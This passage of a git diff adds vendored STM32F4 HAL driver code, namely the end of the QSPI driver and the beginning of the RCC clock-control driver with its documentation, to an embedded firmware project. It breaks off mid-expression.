(QSPI_HandleTypeDef*)(hdma->Parent); + hqspi->RxXferCount = 0U; + + /* Enable the QSPI transfer complete Interrupt */ + __HAL_QSPI_ENABLE_IT(hqspi, QSPI_IT_TC); +} + +/** + * @brief DMA QSPI transmit process complete callback. + * @param hdma : DMA handle + * @retval None + */ +static void QSPI_DMATxCplt(DMA_HandleTypeDef *hdma) +{ + QSPI_HandleTypeDef* hqspi = (QSPI_HandleTypeDef*)(hdma->Parent); + hqspi->TxXferCount = 0U; + + /* Enable the QSPI transfer complete Interrupt */ + __HAL_QSPI_ENABLE_IT(hqspi, QSPI_IT_TC); +} + +/** + * @brief DMA QSPI receive process half complete callback. + * @param hdma : DMA handle + * @retval None + */ +static void QSPI_DMARxHalfCplt(DMA_HandleTypeDef *hdma) +{ + QSPI_HandleTypeDef* hqspi = (QSPI_HandleTypeDef*)(hdma->Parent); + +#if (USE_HAL_QSPI_REGISTER_CALLBACKS == 1) + hqspi->RxHalfCpltCallback(hqspi); +#else + HAL_QSPI_RxHalfCpltCallback(hqspi); +#endif +} + +/** + * @brief DMA QSPI transmit process half complete callback. + * @param hdma : DMA handle + * @retval None + */ +static void QSPI_DMATxHalfCplt(DMA_HandleTypeDef *hdma) +{ + QSPI_HandleTypeDef* hqspi = (QSPI_HandleTypeDef*)(hdma->Parent); + +#if (USE_HAL_QSPI_REGISTER_CALLBACKS == 1) + hqspi->TxHalfCpltCallback(hqspi); +#else + HAL_QSPI_TxHalfCpltCallback(hqspi); +#endif +} + +/** + * @brief DMA QSPI communication error callback. + * @param hdma : DMA handle + * @retval None + */ +static void QSPI_DMAError(DMA_HandleTypeDef *hdma) +{ + QSPI_HandleTypeDef* hqspi = ( QSPI_HandleTypeDef* )(hdma->Parent); + + /* if DMA error is FIFO error ignore it */ + if(HAL_DMA_GetError(hdma) != HAL_DMA_ERROR_FE) + { + hqspi->RxXferCount = 0U; + hqspi->TxXferCount = 0U; + hqspi->ErrorCode |= HAL_QSPI_ERROR_DMA; + + /* Disable the DMA transfer by clearing the DMAEN bit in the QSPI CR register */ + CLEAR_BIT(hqspi->Instance->CR, QUADSPI_CR_DMAEN); + + /* Abort the QSPI */ + (void)HAL_QSPI_Abort_IT(hqspi); + + } +} + +/** + * @brief DMA QSPI abort complete callback. + * @param hdma : DMA handle + * @retval None + */ +static void QSPI_DMAAbortCplt(DMA_HandleTypeDef *hdma) +{ + QSPI_HandleTypeDef* hqspi = ( QSPI_HandleTypeDef* )(hdma->Parent); + + hqspi->RxXferCount = 0U; + hqspi->TxXferCount = 0U; + + if(hqspi->State == HAL_QSPI_STATE_ABORT) + { + /* DMA Abort called by QSPI abort */ + /* Clear interrupt */ + __HAL_QSPI_CLEAR_FLAG(hqspi, QSPI_FLAG_TC); + + /* Enable the QSPI Transfer Complete Interrupt */ + __HAL_QSPI_ENABLE_IT(hqspi, QSPI_IT_TC); + + /* Configure QSPI: CR register with Abort request */ + SET_BIT(hqspi->Instance->CR, QUADSPI_CR_ABORT); + } + else + { + /* DMA Abort called due to a transfer error interrupt */ + /* Change state of QSPI */ + hqspi->State = HAL_QSPI_STATE_READY; + + /* Error callback */ +#if (USE_HAL_QSPI_REGISTER_CALLBACKS == 1) + hqspi->ErrorCallback(hqspi); +#else + HAL_QSPI_ErrorCallback(hqspi); +#endif + } +} + +/** + * @brief Wait for a flag state until timeout. + * @param hqspi : QSPI handle + * @param Flag : Flag checked + * @param State : Value of the flag expected + * @param Tickstart : Tick start value + * @param Timeout : Duration of the timeout + * @retval HAL status + */ +static HAL_StatusTypeDef QSPI_WaitFlagStateUntilTimeout(QSPI_HandleTypeDef *hqspi, uint32_t Flag, + FlagStatus State, uint32_t Tickstart, uint32_t Timeout) +{ + /* Wait until flag is in expected state */ + while((__HAL_QSPI_GET_FLAG(hqspi, Flag)) != State) + { + /* Check for the Timeout */ + if (Timeout != HAL_MAX_DELAY) + { + if(((HAL_GetTick() - Tickstart) > Timeout) || (Timeout == 0U)) + { + hqspi->State = HAL_QSPI_STATE_ERROR; + hqspi->ErrorCode |= HAL_QSPI_ERROR_TIMEOUT; + + return HAL_ERROR; + } + } + } + return HAL_OK; +} + +/** + * @brief Wait for a flag state until timeout using CPU cycle. + * @param hqspi : QSPI handle + * @param Flag : Flag checked + * @param State : Value of the flag expected + * @param Timeout : Duration of the timeout + * @retval HAL status + */ +static HAL_StatusTypeDef QSPI_WaitFlagStateUntilTimeout_CPUCycle(QSPI_HandleTypeDef *hqspi, uint32_t Flag, FlagStatus State, uint32_t Timeout) +{ + __IO uint32_t count = Timeout * (SystemCoreClock / 16U / 1000U); + do + { + if (count-- == 0U) + { + hqspi->State = HAL_QSPI_STATE_ERROR; + hqspi->ErrorCode |= HAL_QSPI_ERROR_TIMEOUT; + return HAL_TIMEOUT; + } + } + while ((__HAL_QSPI_GET_FLAG(hqspi, Flag)) != State); + + return HAL_OK; +} + +/** + * @brief Configure the communication registers. + * @param hqspi : QSPI handle + * @param cmd : structure that contains the command configuration information + * @param FunctionalMode : functional mode to configured + * This parameter can be one of the following values: + * @arg QSPI_FUNCTIONAL_MODE_INDIRECT_WRITE: Indirect write mode + * @arg QSPI_FUNCTIONAL_MODE_INDIRECT_READ: Indirect read mode + * @arg QSPI_FUNCTIONAL_MODE_AUTO_POLLING: Automatic polling mode + * @arg QSPI_FUNCTIONAL_MODE_MEMORY_MAPPED: Memory-mapped mode + * @retval None + */ +static void QSPI_Config(QSPI_HandleTypeDef *hqspi, QSPI_CommandTypeDef *cmd, uint32_t FunctionalMode) +{ + assert_param(IS_QSPI_FUNCTIONAL_MODE(FunctionalMode)); + + if ((cmd->DataMode != QSPI_DATA_NONE) && (FunctionalMode != QSPI_FUNCTIONAL_MODE_MEMORY_MAPPED)) + { + /* Configure QSPI: DLR register with the number of data to read or write */ + WRITE_REG(hqspi->Instance->DLR, (cmd->NbData - 1U)); + } + + if (cmd->InstructionMode != QSPI_INSTRUCTION_NONE) + { + if (cmd->AlternateByteMode != QSPI_ALTERNATE_BYTES_NONE) + { + /* Configure QSPI: ABR register with alternate bytes value */ + WRITE_REG(hqspi->Instance->ABR, cmd->AlternateBytes); + + if (cmd->AddressMode != QSPI_ADDRESS_NONE) + { + /*---- Command with instruction, address and alternate bytes ----*/ + /* Configure QSPI: CCR register with all communications parameters */ + WRITE_REG(hqspi->Instance->CCR, (cmd->DdrMode | cmd->DdrHoldHalfCycle | cmd->SIOOMode | + cmd->DataMode | (cmd->DummyCycles << QUADSPI_CCR_DCYC_Pos) | + cmd->AlternateBytesSize | cmd->AlternateByteMode | + cmd->AddressSize | cmd->AddressMode | cmd->InstructionMode | + cmd->Instruction | FunctionalMode)); + + if (FunctionalMode != QSPI_FUNCTIONAL_MODE_MEMORY_MAPPED) + { + /* Configure QSPI: AR register with address value */ + WRITE_REG(hqspi->Instance->AR, cmd->Address); + } + } + else + { + /*---- Command with instruction and alternate bytes ----*/ + /* Configure QSPI: CCR register with all communications parameters */ + WRITE_REG(hqspi->Instance->CCR, (cmd->DdrMode | cmd->DdrHoldHalfCycle | cmd->SIOOMode | + cmd->DataMode | (cmd->DummyCycles << QUADSPI_CCR_DCYC_Pos) | + cmd->AlternateBytesSize | cmd->AlternateByteMode | + cmd->AddressMode | cmd->InstructionMode | + cmd->Instruction | FunctionalMode)); + } + } + else + { + if (cmd->AddressMode != QSPI_ADDRESS_NONE) + { + /*---- Command with instruction and address ----*/ + /* Configure QSPI: CCR register with all communications parameters */ + WRITE_REG(hqspi->Instance->CCR, (cmd->DdrMode | cmd->DdrHoldHalfCycle | cmd->SIOOMode | + cmd->DataMode | (cmd->DummyCycles << QUADSPI_CCR_DCYC_Pos) | + cmd->AlternateByteMode | cmd->AddressSize | cmd->AddressMode | + cmd->InstructionMode | cmd->Instruction | FunctionalMode)); + + if (FunctionalMode != QSPI_FUNCTIONAL_MODE_MEMORY_MAPPED) + { + /* Configure QSPI: AR register with address value */ + WRITE_REG(hqspi->Instance->AR, cmd->Address); + } + } + else + { + /*---- Command with only instruction ----*/ + /* Configure QSPI: CCR register with all communications parameters */ + WRITE_REG(hqspi->Instance->CCR, (cmd->DdrMode | cmd->DdrHoldHalfCycle | cmd->SIOOMode | + cmd->DataMode | (cmd->DummyCycles << QUADSPI_CCR_DCYC_Pos) | + cmd->AlternateByteMode | cmd->AddressMode | + cmd->InstructionMode | cmd->Instruction | FunctionalMode)); + } + } + } + else + { + if (cmd->AlternateByteMode != QSPI_ALTERNATE_BYTES_NONE) + { + /* Configure QSPI: ABR register with alternate bytes value */ + WRITE_REG(hqspi->Instance->ABR, cmd->AlternateBytes); + + if (cmd->AddressMode != QSPI_ADDRESS_NONE) + { + /*---- Command with address and alternate bytes ----*/ + /* Configure QSPI: CCR register with all communications parameters */ + WRITE_REG(hqspi->Instance->CCR, (cmd->DdrMode | cmd->DdrHoldHalfCycle | cmd->SIOOMode | + cmd->DataMode | (cmd->DummyCycles << QUADSPI_CCR_DCYC_Pos) | + cmd->AlternateBytesSize | cmd->AlternateByteMode | + cmd->AddressSize | cmd->AddressMode | + cmd->InstructionMode | FunctionalMode)); + + if (FunctionalMode != QSPI_FUNCTIONAL_MODE_MEMORY_MAPPED) + { + /* Configure QSPI: AR register with address value */ + WRITE_REG(hqspi->Instance->AR, cmd->Address); + } + } + else + { + /*---- Command with only alternate bytes ----*/ + /* Configure QSPI: CCR register with all communications parameters */ + WRITE_REG(hqspi->Instance->CCR, (cmd->DdrMode | cmd->DdrHoldHalfCycle | cmd->SIOOMode | + cmd->DataMode | (cmd->DummyCycles << QUADSPI_CCR_DCYC_Pos) | + cmd->AlternateBytesSize | cmd->AlternateByteMode | + cmd->AddressMode | cmd->InstructionMode | FunctionalMode)); + } + } + else + { + if (cmd->AddressMode != QSPI_ADDRESS_NONE) + { + /*---- Command with only address ----*/ + /* Configure QSPI: CCR register with all communications parameters */ + WRITE_REG(hqspi->Instance->CCR, (cmd->DdrMode | cmd->DdrHoldHalfCycle | cmd->SIOOMode | + cmd->DataMode | (cmd->DummyCycles << QUADSPI_CCR_DCYC_Pos) | + cmd->AlternateByteMode | cmd->AddressSize | + cmd->AddressMode | cmd->InstructionMode | FunctionalMode)); + + if (FunctionalMode != QSPI_FUNCTIONAL_MODE_MEMORY_MAPPED) + { + /* Configure QSPI: AR register with address value */ + WRITE_REG(hqspi->Instance->AR, cmd->Address); + } + } + else + { + /*---- Command with only data phase ----*/ + if (cmd->DataMode != QSPI_DATA_NONE) + { + /* Configure QSPI: CCR register with all communications parameters */ + WRITE_REG(hqspi->Instance->CCR, (cmd->DdrMode | cmd->DdrHoldHalfCycle | cmd->SIOOMode | + cmd->DataMode | (cmd->DummyCycles << QUADSPI_CCR_DCYC_Pos) | + cmd->AlternateByteMode | cmd->AddressMode | + cmd->InstructionMode | FunctionalMode)); + } + } + } + } +} + +/** + * @} + */ + +/** + * @} + */ + +#endif /* HAL_QSPI_MODULE_ENABLED */ +/** + * @} + */ + +/** + * @} + */ + +#endif /* defined(QUADSPI) */ + +/************************ (C) COPYRIGHT STMicroelectronics *****END OF FILE****/ diff --git a/body/board/inc/STM32F4xx_HAL_Driver/Src/stm32f4xx_hal_rcc.c b/body/board/inc/STM32F4xx_HAL_Driver/Src/stm32f4xx_hal_rcc.c new file mode 100644 index 000000000..552ef18ed --- /dev/null +++ b/body/board/inc/STM32F4xx_HAL_Driver/Src/stm32f4xx_hal_rcc.c @@ -0,0 +1,1125 @@ +/** + ****************************************************************************** + * @file stm32f4xx_hal_rcc.c + * @author MCD Application Team + * @brief RCC HAL module driver. + * This file provides firmware functions to manage the following + * functionalities of the Reset and Clock Control (RCC) peripheral: + * + Initialization and de-initialization functions + * + Peripheral Control functions + * + @verbatim + ============================================================================== + ##### RCC specific features ##### + ============================================================================== + [..] + After reset the device is running from Internal High Speed oscillator + (HSI 16MHz) with Flash 0 wait state, Flash prefetch buffer, D-Cache + and I-Cache are disabled, and all peripherals are off except internal + SRAM, Flash and JTAG. + (+) There is no prescaler on High speed (AHB) and Low speed (APB) busses; + all peripherals mapped on these busses are running at HSI speed. + (+) The clock for all peripherals is switched off, except the SRAM and FLASH. + (+) All GPIOs are in input floating state, except the JTAG pins which + are assigned to be used for debug purpose. + + [..] + Once the device started from reset, the user application has to: + (+) Configure the clock source to be used to drive the System clock + (if the application needs higher frequency/performance) + (+) Configure the System clock frequency and Flash settings + (+) Configure the AHB and APB busses prescalers + (+) Enable the clock for the peripheral(s) to be used + (+) Configure the clock source(s) for peripherals which clocks are not + derived from the System clock (I2S, RTC, ADC, USB OTG FS/SDIO/RNG) + + ##### RCC Limitations ##### + ============================================================================== + [..] + A delay between an RCC peripheral clock enable and the effective peripheral + enabling should be taken into account in order to manage the peripheral read/write + from/to registers. + (+) This delay depends on the peripheral mapping. + (+) If peripheral is mapped on AHB: the delay is 2 AHB clock cycle + after the clock enable bit is set on the hardware register + (+) If peripheral is mapped on APB: the delay is 2 APB clock cycle + after the clock enable bit is set on the hardware register + + [..] + Implemented Workaround: + (+) For AHB & APB peripherals, a dummy read to the peripheral register has been + inserted in each __HAL_RCC_PPP_CLK_ENABLE() macro. + + @endverbatim + ****************************************************************************** + * @attention + * + *

© Copyright (c) 2017 STMicroelectronics. + * All rights reserved.

+ * + * This software component is licensed by ST under BSD 3-Clause license, + * the "License"; You may not use this file except in compliance with the + * License. You may obtain a copy of the License at: + * opensource.org/licenses/BSD-3-Clause + * + ****************************************************************************** + */ + +/* Includes ------------------------------------------------------------------*/ +#include "stm32f4xx_hal.h" + +/** @addtogroup STM32F4xx_HAL_Driver + * @{ + */ + +/** @defgroup RCC RCC + * @brief RCC HAL module driver + * @{ + */ + +#ifdef HAL_RCC_MODULE_ENABLED + +/* Private typedef -----------------------------------------------------------*/ +/* Private define ------------------------------------------------------------*/ +/** @addtogroup RCC_Private_Constants + * @{ + */ + +/* Private macro -------------------------------------------------------------*/ +#define __MCO1_CLK_ENABLE() __HAL_RCC_GPIOA_CLK_ENABLE() +#define MCO1_GPIO_PORT GPIOA +#define MCO1_PIN GPIO_PIN_8 + +#define __MCO2_CLK_ENABLE() __HAL_RCC_GPIOC_CLK_ENABLE() +#define MCO2_GPIO_PORT GPIOC +#define MCO2_PIN GPIO_PIN_9 +/** + * @} + */ + +/* Private variables ---------------------------------------------------------*/ +/** @defgroup RCC_Private_Variables RCC Private Variables + * @{ + */ +/** + * @} + */ +/* Private function prototypes -----------------------------------------------*/ +/* Private functions ---------------------------------------------------------*/ + +/** @defgroup RCC_Exported_Functions RCC Exported Functions + * @{ + */ + +/** @defgroup RCC_Exported_Functions_Group1 Initialization and de-initialization functions + * @brief Initialization and Configuration functions + * +@verbatim + =============================================================================== + ##### Initialization and de-initialization functions ##### + =============================================================================== + [..] + This section provides functions allowing to configure the internal/external oscillators + (HSE, HSI, LSE, LSI, PLL, CSS and MCO) and the System busses clocks (SYSCLK, AHB, APB1 + and APB2). + + [..] Internal/external clock and PLL configuration + (#) HSI (high-speed internal), 16 MHz factory-trimmed RC used directly or through + the PLL as System clock source. + + (#) LSI (low-speed internal), 32 KHz low consumption RC used as IWDG and/or RTC + clock source. + + (#) HSE (high-speed external), 4 to 26 MHz crystal oscillator used directly or + through the PLL as System clock source. Can be used also as RTC clock source. + + (#) LSE (low-speed external), 32 KHz oscillator used as RTC clock source. + + (#) PLL (clocked by HSI or HSE), featuring two different output clocks: + (++) The first output is used to generate the high speed system clock (up to 168 MHz) + (++) The second output is used to generate the clock for the USB OTG FS (48 MHz), + the random analog generator (<=48 MHz) and the SDIO (<= 48 MHz). + + (#) CSS (Clock security system), once enable using the macro __HAL_RCC_CSS_ENABLE() + and if a HSE clock failure occurs(HSE used directly or through PLL as System + clock source), the System clocks automatically switched to HSI and an interrupt + is generated if enabled. The interrupt is linked to the Cortex-M4 NMI + (Non-Maskable Interrupt) exception vector. + + (#) MCO1 (microcontroller clock output), used to output HSI, LSE, HSE or PLL + clock (through a configurable prescaler) on PA8 pin. + + (#) MCO2 (microcontroller clock output), used to output HSE, PLL, SYSCLK or PLLI2S + clock (through a configurable prescaler) on PC9 pin. + + [..] System, AHB and APB busses clocks configuration + (#) Several clock sources can be used to drive the System clock (SYSCLK): HSI, + HSE and PLL. + The AHB clock (HCLK) is derived from System clock through configurable + prescaler and used to clock the CPU, memory and peripherals mapped + on AHB bus (DMA, GPIO...). APB1 (PCLK1) and APB2 (PCLK2) clocks are derived + from AHB clock through configurable prescalers and used to clock + the peripherals mapped on these busses. You can use + "HAL_RCC_GetSysClockFreq()" function to retrieve the frequencies of these clocks. + + (#) For the STM32F405xx/07xx and STM32F415xx/17xx devices, the maximum + frequency of the SYSCLK and HCLK is 168 MHz, PCLK2 84 MHz and PCLK1 42 MHz. + Depending on the device voltage range, the maximum frequency should + be adapted accordingly (refer to the product datasheets for more details). + + (#) For the STM32F42xxx, STM32F43xxx, STM32F446xx, STM32F469xx and STM32F479xx devices, + the maximum frequency of the SYSCLK and HCLK is 180 MHz, PCLK2 90 MHz and PCLK1 45 MHz. + Depending on the device voltage range, the maximum frequency should + be adapted accordingly (refer to the product datasheets for more details). + + (#) For the STM32F401xx, the maximum frequency of the SYSCLK and HCLK is 84 MHz, + PCLK2 84 MHz and PCLK1 42 MHz. + Depending on the device voltage range, the maximum frequency should + be adapted accordingly (refer to the product datasheets for more details). + + (#) For the STM32F41xxx, the maximum frequency of the SYSCLK and HCLK is 100 MHz, + PCLK2 100 MHz and PCLK1 50 MHz. + Depending on the device voltage range, the maximum frequency should + be adapted accordingly (refer to the product datasheets for more details). + +@endverbatim + * @{ + */ + +/** + * @brief Resets the RCC clock configuration to the default reset state. + * @note The default reset state of the clock configuration is given below: + * - HSI ON and used as system clock source + * - HSE and PLL OFF + * - AHB, APB1 and APB2 prescaler set to 1. + * - CSS, MCO1 and MCO2 OFF + * - All interrupts disabled + * @note This function doesn't modify the configuration of the + * - Peripheral clocks + * - LSI, LSE and RTC clocks + * @retval HAL status + */ +__weak HAL_StatusTypeDef HAL_RCC_DeInit(void) +{ + return HAL_OK; +} + +/** + * @brief Initializes the RCC Oscillators according to the specified parameters in the + * RCC_OscInitTypeDef. + * @param RCC_OscInitStruct pointer to an RCC_OscInitTypeDef structure that + * contains the configuration information for the RCC Oscillators. + * @note The PLL is not disabled when used as system clock. + * @note Transitions LSE Bypass to LSE On and LSE On to LSE Bypass are not + * supported by this API. User should request a transition to LSE Off + * first and then LSE On or LSE Bypass. + * @note Transition HSE Bypass to HSE On and HSE On to HSE Bypass are not + * supported by this API. User should request a transition to HSE Off + * first and then HSE On or HSE Bypass. + * @retval HAL status + */ +__weak HAL_StatusTypeDef HAL_RCC_OscConfig(RCC_OscInitTypeDef *RCC_OscInitStruct) +{ + uint32_t tickstart, pll_config; + + /* Check Null pointer */ + if(RCC_OscInitStruct == NULL) + { + return HAL_ERROR; + } + + /* Check the parameters */ + assert_param(IS_RCC_OSCILLATORTYPE(RCC_OscInitStruct->OscillatorType)); + /*------------------------------- HSE Configuration ------------------------*/ + if(((RCC_OscInitStruct->OscillatorType) & RCC_OSCILLATORTYPE_HSE) == RCC_OSCILLATORTYPE_HSE) + { + /* Check the parameters */ + assert_param(IS_RCC_HSE(RCC_OscInitStruct->HSEState)); + /* When the HSE is used as system clock or clock source for PLL in these cases HSE will not disabled */ + if((__HAL_RCC_GET_SYSCLK_SOURCE() == RCC_CFGR_SWS_HSE) ||\ + ((__HAL_RCC_GET_SYSCLK_SOURCE() == RCC_CFGR_SWS_PLL) && ((RCC->PLLCFGR & RCC_PLLCFGR_PLLSRC) == RCC_PLLCFGR_PLLSRC_HSE))) + { + if((__HAL_RCC_GET_FLAG(RCC_FLAG_HSERDY) != RESET) && (RCC_OscInitStruct->HSEState == RCC_HSE_OFF)) + { + return HAL_ERROR; + } + } + else + { + /* Set the new HSE configuration ---------------------------------------*/ + __HAL_RCC_HSE_CONFIG(RCC_OscInitStruct->HSEState); + + /* Check the HSE State */ + if((RCC_OscInitStruct->HSEState) != RCC_HSE_OFF) + { + /* Get Start Tick */ + tickstart = HAL_GetTick(); + + /* Wait till HSE is ready */ + while(__HAL_RCC_GET_FLAG(RCC_FLAG_HSERDY) == RESET) + { + if((HAL_GetTick() - tickstart ) > HSE_TIMEOUT_VALUE) + { + return HAL_TIMEOUT; + } + } + } + else + { + /* Get Start Tick */ + tickstart = HAL_GetTick(); + + /* Wait till HSE is bypassed or disabled */ + while(__HAL_RCC_GET_FLAG(RCC_FLAG_HSERDY) != RESET) + { + if((HAL_GetTick() - tickstart ) > HSE_TIMEOUT_VALUE) + { + return HAL_TIMEOUT; + } + } + } + } + } + /*----------------------------- HSI Configuration --------------------------*/ + if(((RCC_OscInitStruct->OscillatorType) & RCC_OSCILLATORTYPE_HSI) == RCC_OSCILLATORTYPE_HSI) + { + /* Check the parameters */ + assert_param(IS_RCC_HSI(RCC_OscInitStruct->HSIState)); + assert_param(IS_RCC_CALIBRATION_VALUE(RCC_OscInitStruct->HSICalibrationValue)); + + /* Check if HSI is used as system clock or as PLL source when PLL is selected as system clock */ + if((__HAL_RCC_GET_SYSCLK_SOURCE() == RCC_CFGR_SWS_HSI) ||\ + ((__HAL_RCC_GET_SYSCLK_SOURCE() == RCC_CFGR_SWS_PLL) && ((RCC->PLLCFGR & RCC_PLLCFGR_PLLSRC) == RCC_PLLCFGR_PLLSRC_HSI))) + { + /* When HSI is used as system clock it will not disabled */ + if((__HAL_RCC_GET_FLAG(RCC_FLAG_HSIRDY) != RESET) && (RCC_OscInitStruct->HSIState != RCC_HSI_ON)) + { + return HAL_ERROR; + } + /* Otherwise, just the calibration is allowed */ + else + { + /* Adjusts the Internal High Speed oscillator (HSI) calibration value.*/ + __HAL_RCC_HSI_CALIBRATIONVALUE_ADJUST(RCC_OscInitStruct->HSICalibrationValue); + } + } + else + { + /* Check the HSI State */ + if((RCC_OscInitStruct->HSIState)!= RCC_HSI_OFF) + { + /* Enable the Internal High Speed oscillator (HSI). */ + __HAL_RCC_HSI_ENABLE(); + + /* Get Start Tick*/ + tickstart = HAL_GetTick(); + + /* Wait till HSI is ready */ + while(__HAL_RCC_GET_FLAG(RCC_FLAG_HSIRDY) == RESET) + { + if((HAL_GetTick() - tickstart ) > HSI_TIMEOUT_VALUE) + { + return HAL_TIMEOUT; + } + } + + /* Adjusts the Internal High Speed oscillator (HSI) calibration value. */ + __HAL_RCC_HSI_CALIBRATIONVALUE_ADJUST(RCC_OscInitStruct->HSICalibrationValue); + } + else + { + /* Disable the Internal High Speed oscillator (HSI). */ + __HAL_RCC_HSI_DISABLE(); + + /* Get Start Tick*/ + tickstart = HAL_GetTick(); + + /* Wait till HSI is ready */ + while(__HAL_RCC_GET_FLAG(RCC_FLAG_HSIRDY) != RESET) + { + if((HAL_GetTick() - tickstart ) > HSI_TIMEOUT_VALUE) + { + return HAL_TIMEOUT; + } + } + } + } + } + /*------------------------------ LSI Configuration -------------------------*/ + if(((RCC_OscInitStruct->OscillatorType) & RCC_OSCILLATORTYPE_LSI) == RCC_OSCILLATORTYPE_LSI) + { + /* Check the parameters */ + assert_param(IS_RCC_LSI(RCC_OscInitStruct->LSIState)); + + /* Check the LSI State */ + if((RCC_OscInitStruct->LSIState)!= RCC_LSI_OFF) + { + /* Enable the Internal Low Speed oscillator (LSI). */ + __HAL_RCC_LSI_ENABLE(); + + /* Get Start Tick*/ + tickstart = HAL_GetTick(); + + /* Wait till LSI is ready */ + while(__HAL_RCC_GET_FLAG(RCC_FLAG_LSIRDY) == RESET) + { + if((HAL_GetTick() - tickstart ) > LSI_TIMEOUT_VALUE) + { + return HAL_TIMEOUT; + } + } + } + else + { + /* Disable the Internal Low Speed oscillator (LSI). */ + __HAL_RCC_LSI_DISABLE(); + + /* Get Start Tick */ + tickstart = HAL_GetTick(); + + /* Wait till LSI is ready */ + while(__HAL_RCC_GET_FLAG(RCC_FLAG_LSIRDY) != RESET) + { + if((HAL_GetTick() - tickstart ) > LSI_TIMEOUT_VALUE) + { + return HAL_TIMEOUT; + } + } + } + } + /*------------------------------ LSE Configuration -------------------------*/ + if(((RCC_OscInitStruct->OscillatorType) & RCC_OSCILLATORTYPE_LSE) == RCC_OSCILLATORTYPE_LSE) + { + FlagStatus pwrclkchanged = RESET; + + /* Check the parameters */ + assert_param(IS_RCC_LSE(RCC_OscInitStruct->LSEState)); + + /* Update LSE configuration in Backup Domain control register */ + /* Requires to enable write access to Backup Domain of necessary */ + if(__HAL_RCC_PWR_IS_CLK_DISABLED()) + { + __HAL_RCC_PWR_CLK_ENABLE(); + pwrclkchanged = SET; + } + + if(HAL_IS_BIT_CLR(PWR->CR, PWR_CR_DBP)) + { + /* Enable write access to Backup domain */ + SET_BIT(PWR->CR, PWR_CR_DBP); + + /* Wait for Backup domain Write protection disable */ + tickstart = HAL_GetTick(); + + while(HAL_IS_BIT_CLR(PWR->CR, PWR_CR_DBP)) + { + if((HAL_GetTick() - tickstart) > RCC_DBP_TIMEOUT_VALUE) + { + return HAL_TIMEOUT; + } + } + } + + /* Set the new LSE configuration -----------------------------------------*/ + __HAL_RCC_LSE_CONFIG(RCC_OscInitStruct->LSEState); + /* Check the LSE State */ + if((RCC_OscInitStruct->LSEState) != RCC_LSE_OFF) + { + /* Get Start Tick*/ + tickstart = HAL_GetTick(); + + /* Wait till LSE is ready */ + while(__HAL_RCC_GET_FLAG(RCC_FLAG_LSERDY) == RESET) + { + if((HAL_GetTick() - tickstart ) > RCC_LSE_TIMEOUT_VALUE) + { + return HAL_TIMEOUT; + } + } + } + else + { + /* Get Start Tick */ + tickstart = HAL_GetTick(); + + /* Wait till LSE is ready */ + while(__HAL_RCC_GET_FLAG(RCC_FLAG_LSERDY) != RESET) + { + if((HAL_GetTick() - tickstart ) > RCC_LSE_TIMEOUT_VALUE) + { + return HAL_TIMEOUT; + } + } + } + + /* Restore clock configuration if changed */ + if(pwrclkchanged == SET) + { + __HAL_RCC_PWR_CLK_DISABLE(); + } + } + /*-------------------------------- PLL Configuration -----------------------*/ + /* Check the parameters */ + assert_param(IS_RCC_PLL(RCC_OscInitStruct->PLL.PLLState)); + if ((RCC_OscInitStruct->PLL.PLLState) != RCC_PLL_NONE) + { + /* Check if the PLL is used as system clock or not */ + if(__HAL_RCC_GET_SYSCLK_SOURCE() != RCC_CFGR_SWS_PLL) + { + if((RCC_OscInitStruct->PLL.PLLState) == RCC_PLL_ON) + { + /* Check the parameters */ + assert_param(IS_RCC_PLLSOURCE(RCC_OscInitStruct->PLL.PLLSource)); + assert_param(IS_RCC_PLLM_VALUE(RCC_OscInitStruct->PLL.PLLM)); + assert_param(IS_RCC_PLLN_VALUE(RCC_OscInitStruct->PLL.PLLN)); + assert_param(IS_RCC_PLLP_VALUE(RCC_OscInitStruct->PLL.PLLP)); + assert_param(IS_RCC_PLLQ_VALUE(RCC_OscInitStruct->PLL.PLLQ)); + + /* Disable the main PLL. */ + __HAL_RCC_PLL_DISABLE(); + + /* Get Start Tick */ + tickstart = HAL_GetTick(); + + /* Wait till PLL is ready */ + while(__HAL_RCC_GET_FLAG(RCC_FLAG_PLLRDY) != RESET) + { + if((HAL_GetTick() - tickstart ) > PLL_TIMEOUT_VALUE) + { + return HAL_TIMEOUT; + } + } + + /* Configure the main PLL clock source, multiplication and division factors. */ + WRITE_REG(RCC->PLLCFGR, (RCC_OscInitStruct->PLL.PLLSource | \ + RCC_OscInitStruct->PLL.PLLM | \ + (RCC_OscInitStruct->PLL.PLLN << RCC_PLLCFGR_PLLN_Pos) | \ + (((RCC_OscInitStruct->PLL.PLLP >> 1U) - 1U) << RCC_PLLCFGR_PLLP_Pos) | \ + (RCC_OscInitStruct->PLL.PLLQ << RCC_PLLCFGR_PLLQ_Pos))); + /* Enable the main PLL. */ + __HAL_RCC_PLL_ENABLE(); + + /* Get Start Tick */ + tickstart = HAL_GetTick(); + + /* Wait till PLL is ready */ + while(__HAL_RCC_GET_FLAG(RCC_FLAG_PLLRDY) == RESET) + { + if((HAL_GetTick() - tickstart ) > PLL_TIMEOUT_VALUE) + { + return HAL_TIMEOUT; + } + } + } + else + { + /* Disable the main PLL. */ + __HAL_RCC_PLL_DISABLE(); + + /* Get Start Tick */ + tickstart = HAL_GetTick(); + + /* Wait till PLL is ready */ + while(__HAL_RCC_GET_FLAG(RCC_FLAG_PLLRDY) != RESET) + { + if((HAL_GetTick() - tickstart ) > PLL_TIMEOUT_VALUE) + { + return HAL_TIMEOUT; + } + } + } + } + else + { + /* Check if there is a request to disable the PLL used as System clock source */ + if((RCC_OscInitStruct->PLL.PLLState) == RCC_PLL_OFF) + { + return HAL_ERROR; + } + else + { + /* Do not return HAL_ERROR if request repeats the current configuration */ + pll_config = RCC->PLLCFGR; +#if defined (RCC_PLLCFGR_PLLR) + if (((RCC_OscInitStruct->PLL.PLLState) == RCC_PLL_OFF) || + (READ_BIT(pll_config, RCC_PLLCFGR_PLLSRC) != RCC_OscInitStruct->PLL.PLLSource) || + (READ_BIT(pll_config, RCC_PLLCFGR_PLLM) != (RCC_OscInitStruct->PLL.PLLM) << RCC_PLLCFGR_PLLM_Pos) || + (READ_BIT(pll_config, RCC_PLLCFGR_PLLN) != (RCC_OscInitStruct->PLL.PLLN) << RCC_PLLCFGR_PLLN_Pos) || + (READ_BIT(pll_config, RCC_PLLCFGR_PLLP) != (((RCC_OscInitStruct->PLL.PLLP >> 1U) - 1U)) << RCC_PLLCFGR_PLLP_Pos) || + (READ_BIT(pll_config, RCC_PLLCFGR_PLLQ) != (RCC_OscInitStruct->PLL.PLLQ << RCC_PLLCFGR_PLLQ_Pos)) || + (READ_BIT(pll_config, RCC_PLLCFGR_PLLR) != (RCC_OscInitStruct->PLL.PLLR << 